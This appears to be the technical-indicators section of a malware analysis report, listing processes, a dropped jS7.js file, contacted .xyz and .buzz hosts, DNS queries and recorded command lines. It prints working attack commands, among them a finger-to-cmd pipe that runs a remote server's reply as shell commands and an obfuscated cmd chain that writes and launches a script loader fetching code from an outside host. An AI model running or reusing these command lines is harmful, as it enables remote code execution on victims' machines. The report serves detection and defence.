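Technical Information
The entries below list, in order: the processes launched, the file created, the hosts contacted (host:port), the DNS queries issued, and the command lines recorded in this report. Host names are partially masked with '#'. microsoft.com is a shared, legitimate destination (and cl###flare.com appears to be one as well), so those entries are weak indicators on their own; the .xyz and .buzz hosts and the finger.exe traffic to port 79 are the distinctive ones.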
- '<SYSTEM32>\finger.exe' ok@50iorv.bvcxss.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\jS7.js"
- %LOCALAPPDATA%\js7.js
- '50####.bvcxss.xyz':79
- 'xd####.xczvad.buzz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- '50####.bvcxss.xyz':79
- 'cl###flare.com':443
- DNS ASK 50####.bvcxss.xyz
- DNS ASK xd####.xczvad.buzz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
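- '<SYSTEM32>\cmd.exe' /c finger ok@50iorv.bvcxss.xyz |more +2 |cmd
  (Note: the text returned by the remote finger service is passed through more +2 and then piped into cmd, so the server's response is executed as commands. An outbound finger.exe connection on TCP port 79 whose output feeds a shell is the behaviour to alert on.)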
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt FCCR=.j&&SEt FNKAJ=vHR03arHR03 a =HR03 'scHR03riHR03ptHR03:'; b =HR03 'hHR03TtPHR03:'; GHR03etHR03ObjHR03ecHR03t(HR03a+b+'&&sET XJR6=ITOECITOECxdiaew.xczvad.buzzITOEC?1ITOEC')&&sEt/...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p LTN86="%FNKAJ:HR03=%%XJR6:ITOEC=/%" 0<nul 1>%LOCALAPPDATA%\jS7%FCCR%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\jS7%FCCR%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\jS7.js